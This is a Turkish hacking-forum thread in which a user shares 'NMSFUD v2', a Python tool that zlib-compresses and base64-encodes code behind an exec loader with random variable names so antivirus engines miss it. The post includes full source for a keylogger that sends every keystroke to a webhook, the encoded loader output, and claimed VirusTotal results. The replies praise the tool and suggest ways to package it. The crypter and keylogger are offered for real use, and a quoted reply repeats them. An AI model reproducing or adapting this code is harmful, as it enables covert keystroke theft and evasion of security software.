NMSFUD v2

NMSHacking · Pazartesi saat 19:51'de

Merhabalar. Python kodunu base64 ile şifreleyen ve random değişken isimleri ile kodun antivirüslerin tarafından algılanmasını zorlaştıran (mevcut durumda 0/64) bir uygulama yazdım. Uygulama yazdığınız zararlı yazılımın kodunu direkt şifreler ve yeni bir dosya oluşturur. O dosyayı çalıştırmanız durumunda yine aynı işlevi görecektir.
FUD Yazılımı
Öncelikle herhangi bir yerde bir python dosyası oluşturun. Ardından dosyayı açın ve içine aşağıdaki kodu girin ve dosyayı kaydedin.

Python:

import base64
import zlib
import random
import string

def rastgele_string(uzunluk):
    harfler = string.ascii_letters + string.digits
    return ''.join(random.choice(harfler) for i in range(uzunluk))

# Kullanıcıdan alınan orijinal kod
orijinal_kod = input("Şifrelenmesi gereken kodu girin:\n")

# Kodu sıkıştır ve base64 ile encode et
sikistirilmis_kod = zlib.compress(orijinal_kod.encode())
encoded_kod = base64.b64encode(sikistirilmis_kod).decode()

# Decode ve dekompres fonksiyonları
decode_fonksiyonu = '''
import base64
import zlib

encoded_kod = "{}"
sikistirilmis_kod = base64.b64decode(encoded_kod)
orijinal_kod = zlib.decompress(sikistirilmis_kod).decode()
exec(orijinal_kod)
'''.format(encoded_kod)

# Rastgele değişken adları kullan
obfuscate_edilmis_kod = decode_fonksiyonu.replace('encoded_kod', rastgele_string(10)).replace('sikistirilmis_kod', rastgele_string(10)).replace('orijinal_kod', rastgele_string(10))

# Obfuscate edilmiş kodu dosyaya yaz
with open("obfuscate_edilmis_kod.py", "w") as f:
    f.write(obfuscate_edilmis_kod)

print("Kod obfuscate edildi ve 'obfuscate_edilmis_kod.py' dosyasına kaydedildi.")

Şimdi bu kodu Python kullanarak çalıştırın. Karşınıza aşağıdaki ekran gelecektir.

Şimdi zararlı yazılımınızın kodunu girin. Ben webhook kullanan bir keylogger kodunu girdim.

Bunun ardından yazılım kodu çevirdi ve obfuscate_edilmis_kod.py şeklinde kaydetti. Şimdi ise VirusTotalda (VirusTotal kullanmanızda sakınca olabilir. Ben şu an dönüştürdüğüm keyloggerı kullanmayacağım için yükledim. Lütfen siz yüklemeyin.) dosyalarımızı test edelim.
Normal Keylogger Kodu:

Python:

import pynput.keyboard
import requests

# Webhook URL
WEBHOOK_URL = 'VirusTotalde burada url vardı. Ben burada webhook paylaşmak istemediğimden linki sildim.'

class Keylogger:
    def __init__(self):
        self.log = ""

    def update_log(self, key_str):
        if key_str == 'Key.backspace':
            self.log = self.log[:-1]
        else:
            self.log += key_str
        self.send_log()

    def send_log(self):
        payload = {'content': self.log}
        requests.post(WEBHOOK_URL, data=payload)

    def on_press(self, key):
        try:
            key_str = key.char
        except AttributeError:
            if key == key.space:
                key_str = ' '
            elif key == key.backspace:
                key_str = 'Key.backspace'
            else:
                key_str = ' ' + str(key) + ' '
        self.update_log(key_str)

    def start(self):
        keyboard_listener = pynput.keyboard.Listener(on_press=self.on_press)
        with keyboard_listener:
            keyboard_listener.join()

if __name__ == "__main__":
    keylogger = Keylogger()
    keylogger.start()

Şifrelenmiş Kod:

Python:

import base64
import zlib

VlogfwDlnq = "eJzLzC3ILypRKKjMKygt0ctOrUzKTyxKAQBm9Qjr"
Yb2bluZnS4 = base64.b64decode(VlogfwDlnq)
lBfylteg01 = zlib.decompress(Yb2bluZnS4).decode()
exec(lBfylteg01)

Normal kodu yükledim. Ve sonucu: VirusTotal

Şifrelenmiş kodu yükledim. Ve sonucu:

VirusTotal

www.virustotal.com

Normal kodda pyspy olarak gözüken ve 12/65 tespit edilen zararlı yazılımımız şifrelenmiş kodda hiçbir antivirüs tarafından tespit edilemedi.

Program Notları:
Bu programda şifrelenmiş kodu direkt pyinstaller ile derlemeniz durumunda kod çalışmayacaktır. Bu sorunu şifrelenmiş kodu derlemeden önce zararlı yazılımda bulunan kütüphaneleri şifrelenmiş koda ekleyerek çözebilirsiniz. v3 sürümünde bu sorunu otomatik çözen bir fonksiyon ekleyeceğim.
Programın sonraki sürümleri için eklememi istediğiniz özellikleri aşağıya yazabilirsiniz.

Reksy · Pazartesi saat 19:52'de

Eline Sağlık Dostum .

NMSHacking · Pazartesi saat 19:52'de

Reksy' Alıntı:
Eline Sağlık Dostum .

Teşekkür ederim.

Mamilate · Pazartesi saat 19:55'de

Güzel olmuş ama kod girmek yerine dosya yolunu girse daha kolay ve kullanıcı dostu olabilir.

NMSHacking · Pazartesi saat 19:56'de

Mamilate' Alıntı:
Güzel olmuş ama kod girmek yerine dosya yolunu girse daha kolay ve kullanıcı dostu olabilir.

v3 sürümünde önerinizi dikkate alacağım. Teşekkürler.

anonim5 · Pazartesi saat 20:18'de

NMSHacking' Alıntı:
Merhabalar. Python kodunu base64 ile şifreleyen ve random değişken isimleri ile kodun antivirüslerin tarafından algılanmasını zorlaştıran (mevcut durumda 0/64) bir uygulama yazdım. Uygulama yazdığınız zararlı yazılımın kodunu direkt şifreler ve yeni bir dosya oluşturur. O dosyayı çalıştırmanız durumunda yine aynı işlevi görecektir.
FUD Yazılımı
Öncelikle herhangi bir yerde bir python dosyası oluşturun. Ardından dosyayı açın ve içine aşağıdaki kodu girin ve dosyayı kaydedin.

Python:

import base64 import zlib import random import string def rastgele_string(uzunluk): harfler = string.ascii_letters + string.digits return ''.join(random.choice(harfler) for i in range(uzunluk)) # Kullanıcıdan alınan orijinal kod orijinal_kod = input("Şifrelenmesi gereken kodu girin:\n") # Kodu sıkıştır ve base64 ile encode et sikistirilmis_kod = zlib.compress(orijinal_kod.encode()) encoded_kod = base64.b64encode(sikistirilmis_kod).decode() # Decode ve dekompres fonksiyonları decode_fonksiyonu = ''' import base64 import zlib encoded_kod = "{}" sikistirilmis_kod = base64.b64decode(encoded_kod) orijinal_kod = zlib.decompress(sikistirilmis_kod).decode() exec(orijinal_kod) '''.format(encoded_kod) # Rastgele değişken adları kullan obfuscate_edilmis_kod = decode_fonksiyonu.replace('encoded_kod', rastgele_string(10)).replace('sikistirilmis_kod', rastgele_string(10)).replace('orijinal_kod', rastgele_string(10)) # Obfuscate edilmiş kodu dosyaya yaz with open("obfuscate_edilmis_kod.py", "w") as f: f.write(obfuscate_edilmis_kod) print("Kod obfuscate edildi ve 'obfuscate_edilmis_kod.py' dosyasına kaydedildi.")

Şimdi bu kodu Python kullanarak çalıştırın. Karşınıza aşağıdaki ekran gelecektir.

Şimdi zararlı yazılımınızın kodunu girin. Ben webhook kullanan bir keylogger kodunu girdim.

Bunun ardından yazılım kodu çevirdi ve obfuscate_edilmis_kod.py şeklinde kaydetti. Şimdi ise VirusTotalda (VirusTotal kullanmanızda sakınca olabilir. Ben şu an dönüştürdüğüm keyloggerı kullanmayacağım için yükledim. Lütfen siz yüklemeyin.) dosyalarımızı test edelim.
Normal Keylogger Kodu:

Python:

import pynput.keyboard import requests # Webhook URL WEBHOOK_URL = 'VirusTotalde burada url vardı. Ben burada webhook paylaşmak istemediğimden linki sildim.' class Keylogger: def __init__(self): self.log = "" def update_log(self, key_str): if key_str == 'Key.backspace': self.log = self.log[:-1] else: self.log += key_str self.send_log() def send_log(self): payload = {'content': self.log} requests.post(WEBHOOK_URL, data=payload) def on_press(self, key): try: key_str = key.char except AttributeError: if key == key.space: key_str = ' ' elif key == key.backspace: key_str = 'Key.backspace' else: key_str = ' ' + str(key) + ' ' self.update_log(key_str) def start(self): keyboard_listener = pynput.keyboard.Listener(on_press=self.on_press) with keyboard_listener: keyboard_listener.join() if __name__ == "__main__": keylogger = Keylogger() keylogger.start()

Şifrelenmiş Kod:

Python:

import base64 import zlib VlogfwDlnq = "eJzLzC3ILypRKKjMKygt0ctOrUzKTyxKAQBm9Qjr" Yb2bluZnS4 = base64.b64decode(VlogfwDlnq) lBfylteg01 = zlib.decompress(Yb2bluZnS4).decode() exec(lBfylteg01)

Normal kodu yükledim. Ve sonucu: VirusTotal

Şifrelenmiş kodu yükledim. Ve sonucu:

VirusTotal

VirusTotal

www.virustotal.com

Normal kodda pyspy olarak gözüken ve 12/65 tespit edilen zararlı yazılımımız şifrelenmiş kodda hiçbir antivirüs tarafından tespit edilemedi.

Program Notları:
Bu programda şifrelenmiş kodu direkt pyinstaller ile derlemeniz durumunda kod çalışmayacaktır. Bu sorunu şifrelenmiş kodu derlemeden önce zararlı yazılımda bulunan kütüphaneleri şifrelenmiş koda ekleyerek çözebilirsiniz. v3 sürümünde bu sorunu otomatik çözen bir fonksiyon ekleyeceğim.
Programın sonraki sürümleri için eklememi istediğiniz özellikleri aşağıya yazabilirsiniz.

Elinize sağlık

Ogehan · Pazartesi saat 22:28'de

Kod şeklinde mütabık çalışacağını düşünmüyorum dosya yolu eklersen entegre şekilde fudlanabilir

drjacob · Pazartesi saat 22:47'de

Eline sağlık.

NMSHacking · Dün 10:03 da

anonim5' Alıntı:
Elinize sağlık

Teşekkürler.

NMSHacking · Dün 10:04 da

Ogehan' Alıntı:
Kod şeklinde mütabık çalışacağını düşünmüyorum dosya yolu eklersen entegre şekilde fudlanabilir

Kod şeklinde mütabık çalışması için derleme öncesi kullanıcı şifrelenmemiş kodda bulunan kütüphaneleri import etmeli. v3 sürümünü birazdan paylaşacağım. Bu sorunu otomatik çözecek.

NMSHacking · Dün 10:04 da

drjacob' Alıntı:
Eline sağlık.

Teşekkürler.

NMSFUD v2

NMSHacking

Katılımcı Üye

VirusTotal

Reksy

Yeni üye

NMSHacking

Katılımcı Üye

Mamilate

Katılımcı Üye

NMSHacking

Katılımcı Üye

anonim5

Üye

VirusTotal

Ogehan

-

drjacob

Uzman üye

NMSHacking

Katılımcı Üye

NMSHacking

Katılımcı Üye

NMSHacking

Katılımcı Üye

Sosyal medya sayfalarımız